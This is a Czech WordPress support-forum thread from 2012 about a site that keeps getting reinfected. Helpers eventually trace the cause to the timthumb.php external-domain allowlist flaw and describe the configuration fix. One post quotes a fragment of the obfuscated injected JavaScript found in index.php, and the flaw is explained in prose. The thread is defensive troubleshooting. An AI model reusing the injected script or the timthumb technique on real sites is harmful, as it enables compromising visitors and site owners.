Úvodní stránka › Fórum podpory WordPressu › Problémy s WordPressem › Malware
Štítky: Malware, Vir, Webmaster Tools
Zvolené téma obsahuje celkem 25 odpovědí. Do diskuze (4 účastníci) se naposledy zapojil uživatel Lukenzi a poslední změna je stará 12 let, 5 měsíců.
-
AutorPříspěvky
-
13. srpna 2012 (17:06) #1946
Dobry den,
jiz 14 dni odstranuji malware, ale stale se znovu infikuje.
Zaplatil jsem si i rucni vycisteni webu – http://sucuri.net. Problem je ale v tom, ze malware se vzdy infikuje do cca 24 hodin znovu. Nedostanu se ani s blacklistu google.
Vzdy po odstraneni malwaeru provedu doporucene bezpecnostni zmeny (hesla, DB, FTP, Admin,…) http://sucuri.net/after-the-clean-up-what-to-do-after-your-site-is-fixed.html
Dokonce jsem smazal cely web prez FTPS a nahral cistou instlaci s nove zakoupenym themem, ale malware se infikoval zase.
Nemate nekdo podobnou zkusenost? Uz si nevim rady. Dekuji za kazdou radu.
13. srpna 2012 (18:04) #1233313. srpna 2012 (18:16) #12334Wedos
Mam u nich vice micro webu na multihostingu a tento je jediny, ktery je infikovan.
13. srpna 2012 (18:50) #12335Bez podrobnějších informací to tady nikdo nevyřeší, chce to alespoň URL webu.
Hosting WEDOS je ZATÍM bez problémů co se týče bezpečnosti, takže bych to viděl na nějakou skulinu v šabloně nebo nějakém pluginu.
Pokud mi pošlete nějaké info + přístup na FTP můžu ten problém vyřešit (lukenzi@gmail.com).
13. srpna 2012 (19:01) #12336Je to podivné, ale problém v šabloně a pluginu bych vyloučil?
Dokonce jsem smazal cely web prez FTPS a nahral cistou instlaci s nove zakoupenym themem, ale malware se infikoval zase.
Pokud je tam jen čistá instalace a nějaká nová prémiová šablona, tak by tam asi neměl být problém?
Ještě mě napadá zavirovaný počítač, ale potom by bylo asi napadených webů více? Jakým způsobem se ten malware projevuje?
halouzka: To jste si zaplatil vyčištění webu za 89,99 USD nebo to je nějaká jiná služba?
13. srpna 2012 (19:51) #12337Jedna se o web http://www.automatyzdarma.eu
Pocitac je bez viru.
Zaplatil jsem 89,90 USD za vycisteni a zatim mi to cisti kazdy den :)
14. srpna 2012 (8:33) #12338Jen pro informaci mě na Vaší stránku nepustil firefox a odkázal mě na http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=automatyzdarma.eu
14. srpna 2012 (8:37) #12339Ano, to je prave onen black list od google. Protoze web obsahoval/obsahuje Malware, tak je na blacklistu
14. srpna 2012 (14:26) #12340halouzka: Sranda je to, že sucuri vám čistí web i když sami neví co je na něm škodlivého, jako škodlivý jej označili právě pouze kvůli tomu, že jej blokuje google. Google na vašem webu údajně našel trojana a to pouze na 15-ti stránkách z 80 což je samo o sobě podivné, většinou bývá malware includován do všech stránek a né pouze do některých.
Mě spíše zajímá proč jsem schopen získat z úvodní stránky dva rozdílné zdrojové kódy (žádný není nijak škodlivý – jsou pouze malinko rozdílné). Jde o XHR request nějakého pluginu…
EDIT: zdroje rozdílné nejsou pouze při načítání stránky je nějaký XHR request zřejmě ajaxem, který načte tu samou stránku, kterou se pokoušíte zobrazit. Možná bych se ani nebál tvrdit, že jde o planý poplach. Bez podrobnějšího prozkoumání, ale těžko říct…
14. srpna 2012 (16:11) #12341Kouknul jsem na to a výsledek je takový:
1) nenašel jsem žádný škodlivý kód, ani v šabloně ani v pluginech
2) nenašel jsem žádné odkazy nebo cokoliv podivného
3) WordPress, všechny pluginy a šablony jsou aktuální a nenašel jsem žádnou zmínku o nějaké bezpečnostní chybě v současných verzích
4) web jako takový je relativně dobře zabezpečen
Takže nějak nerozumím několika věcem:
1) jak jste poznal, že web je opět infikován i když jste jej celý přeinstaloval? (to, že prohlížeč vrací nějakou hlášku mně nezajímá, mně zajímá konkrétní soubor, script, funkce, odkazy atd atd)
2) co že konkrétně sucuri našel a odstranil (v jakých souborech atd.), protože ve výsledku píše “malware not identified” (viz zde)
3) Jak můžete vědět, že web je do 24. hodin opět infikovaný, jak se to projevilo? – dostat se z blacklistu googlu trvá docela dlouho i když je web čistý, určitě to není záležitost na 24hodin
Jinak pro info McAfee Site Advisor na webu nevidí žádný problém (viz zde).
14. srpna 2012 (18:22) #12342Dobrá práce, Lukenzi. Takže to byl patrně planý poplach? :-)
Pokud halouzka usuzoval, že je web zavirován z toho, že to hlásí vyhledávače (a na základě nich i používané prohlížeče), tak tomu tak už patrně není, protože obvykle nějakou dobu trvá než dojde k opětovnému posouzení bezpečnosti webu. Doporučuji to v tomto případě zkusit urychlit pomocí Webmaster Tools od Google.
15. srpna 2012 (6:58) #12343Predne chci podekovat za Vas cas.
Lukenzi:
1. na email mi prijde upozorneni o infekci z http://sucuri.net nebo zjistim, ze na google tools jsem zase v blacklistu, i kdyz jsem v nem jiz par hodin nefiguroval.
2. vetsinou, kdyz web vycistili panove z http://sucuri.net, tak jsem pozadal google a do 24 hodin me z blacklistu vyhodili, nebo ne. Google tools mi web posuzoval kazdy den.
Admin:
Vzdy, kdyz me informuji (http://sucuri.net), ze je web vycisten, tak pozadam google o kontrolu z google tools. Vetsinou jim to trva do druheho dne. Posledni kontrolu provedl google vcera, kdy mel byt web jiz cisty, ale stale ho ponechal v black listu!
15. srpna 2012 (13:26) #12344Aktuálně teď se mi stránka zobrazí bez jakéhokoliv upozornění, takže předpokládám, že snad je to ok.
Jen mně zaráží, že doteď jsem neviděl nic co by se dalo pokládat opravdu za nějaké nebezpečí na vašem webu. Pokud sucuri něco na vašem webu odstranila tak by snad mohli napsat nějaké konkrétní informace co že to vlastně bylo (popřípadě alespoň v jakém souboru), už třeba jen proto, aby jste tomu mohl v budoucnu předejít.
Z google se nedá zjistit nějaké další informace? Například konkrétně na kterých stránkách byl škodlivý kód nalezen?
Z toho co vím vyplývá jediné a to, že něco na vašem webu označil google za škodlivé (můžet to být klidně jen odkaz na jiný web obsahující něco škodlivého), tomu by i nasvědčovalo to, že to nalezl jen na pouhých 15-ti stránkách z celkových 80. Možná to byl jen odkaz (reklama?) na jiný server (v menu online casina) nebo odkazy z unibetu (také vedou na jiné servery). Těžko říct bez nějakých podrobnějších informací.
Každopádně pokud by se to opakovalo asi bych se nebál použít jinou šablonu vzhledu, vaše je řekl bych extrémně složitá na to co má dělat (mraky ajaxu, framework, vlastní pluginy šablony atd atd) a objevit nějaké zadní vrátka v tolika tisících řádcích zdrojového kódu není zrovna jednoduché… Ostatně to co nakonec vidí uživatel v prohlížeči je skoro to samé co by zvládla malinko upravená výchozí šablona.
15. srpna 2012 (14:24) #12345Tak nyni byl u me google a zase nasel injektaze (viz. nize). Podezrely vlozeny kod je:
<script>try{n|=Math.round;}catch(zxc){m=Math;n="126..135..14
70..1530..448..600..1400..1665..1386..1755..1526..1515..1540
..1740..644..1545..1414..1740..966..1620..1414..1635..1414..
1650..1624..1725..924..1815..1176..1455..1442..1170..1358..1
635..1414..600..546..1470..1554..1500..1694..585..574..1365.
.672..1395..574..1845..182..135..126..135..1470..1530..1596.
.1455..1526..1515..1596..600..574..885..182..135..126..1875.
.448..1515..1512..1725..1414..480..1722..195..126..135..126.
.1500..1554..1485..1638..1635..1414..1650..1624..690..1666..
1710..1470..1740..1414..600..476..900..1470..1530..1596..145
5..1526..1515..448..1725..1596..1485..854..585..1456..1740..
1624..1680..812..705..658..1665..1512..1485..1694..1590..158
2..1680..1638..1560..1498..690..1568..1665..1596..1740..1596
..1515..1512..1455..1694..690..1386..1665..1526..705..1610..
1740..1358..1740..658..1545..1358..690..1568..1560..1568..58
5..448..1785..1470..1500..1624..1560..854..585..686..720..54
6..480..1456..1515..1470..1545..1456..1740..854..585..686..7
20..Adresy URL Typ Poslední kontrola
http://www.automatyzdarma.eu/author/hally2/page/5/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/jack-and-the-beanstalk-5-valcu/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/gonzos-quest/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/stolni-hry-ruleta-blackjack/blackjack/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/zombies-5-valcu-2/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/5-valcu/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/casinoeuro/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/stolni-hry-ruleta-blackjack/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/?p=1077 Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/super-nudge-6000-3-valce/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/?cat=74 Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/scarface-5-valcu/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/blackjack-double-jack/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/vikings-treasure-5-valcu-2/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/safari-madnes/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/5-valcu/page/2/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/automaty-dle-casina/casinoeuro/page/3/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/?p=1018 Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/casino-hry-zdarma/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/frankenstein/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/?cat=69&paged=2 Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/5-valcu/page/3/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/100-bonus-az-do-5000kc/ Injektáž kódu 15.08.12
http://www.automatyzdarma.eu/category/automaty-sloty-zdarma/page/3/15. srpna 2012 (14:25) #12346Varování od Goole:
Google na tomto webu objevil škodlivý kód . Doporučujeme, abyste web rychle vyčistili. Pokud tak neučiníte, uživatelům Google se při pokusu o zobrazení stránek tohoto webu může zobrazit upozornění.
15. srpna 2012 (16:47) #12347Tak to přece jen není planý poplach, škodlivý kód se vždy objeví v souboru index.php v rootu. Problém je ten, že nemůžu přijít na to jak se tam dostane a v době kdy jsem se na něj koukal prvně tam nebyl…
Každopádně poslední změna souboru je 18:07 a to když jsem ho vyčistil a zatím je nezměněn.
EDIT:
malinka úprava, doporučuji změnit hesla (FTP, MYSQL, administrace)
Pokud i teď dojde k infekci tak by možná ještě pomohl log apache, jinak už fakt nevím a začal bych znovu s novým WP a jinou šablonou.
15. srpna 2012 (18:53) #12348Momentalne google hlasi – no blacklist.
Tak doufam, ze preziji noc :)
16. srpna 2012 (16:18) #12350Lukenzi:
jaka byla ta mala uprava?
Zda se, ze zadne nove napadani se nekona.
16. srpna 2012 (16:45) #12351Malinko jsem upravil oba soubory thumb.php v pluginech wp_rokbox a wp_roknewspager což jsou jen přejmenované soubory timthumb.php známé svými bezpečnostními dírami snad v každé předchozí verzi. A ačkoliv je poslední verze pokládána za bezpečnou (čti ještě nikdo nedokázal opak) tak bohužel bezpečná zřejmě není. A protože se tento script pro práci s obrázky vyskytuje ve stovkách možná tisících šablonách a pluginech nemám z toho vůbec žádnou radost…
Než ale budeme dělat nějaké závěry raději bych ještě nějaký čas počkal zda tato malá úprava opravdu vyřešila váš problém. Nebo pokud by to šlo, dost by mně zajímal access log ze serveru (z poslední doby – nejlépe tak týden, samozřejmě na mejl). Pořád ještě nevím konkrétně jaké chyby v tom souboru timthumb.php ta potvora využila, zatím to nedokážu zopakovat…
16. srpna 2012 (17:37) #12352Tak už jsem na to zřejmě přišel, 8.srpna byla reportována tato bezpečnostní chyba – zatím bez reakce.
Script ve výchozím stavu neumožňuje načítání obrázků z externích serverů, ale z nějakého důvodu autoři ponechali povolené domény “flickr.com, staticflickr.com, picasa.com” atd. Problém je v tom, že pokud znám umístění scriptu na vašem serveru a na mém webu s doménou obsahující výše uvedené názvy (třeba flickr.com.cz) budu mít script s nějakým škodlivým kódem můžu jej přes soubor timthumb.php spustit na vašem webu (jednoduše řečeno).
Oprava této chyby spočívá v nastavení konstant
ALLOW_EXTERNAL
naFALSE
,ALLOW_ALL_EXTERNAL_SITES
také na FALSE (řádek 32 a 33).Popřípadě smazat obsah pole
$ALLOWED_SITES
(řádek 127-135). Nebudete sice moci přes tento script načítat obrázky z jiných domén než je doména webu, ale budete bez malware.Pro 100% jistotu, že už bude vše v pořádku bych, ale potřeboval ten log z hostingu…
-
AutorPříspěvky
Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.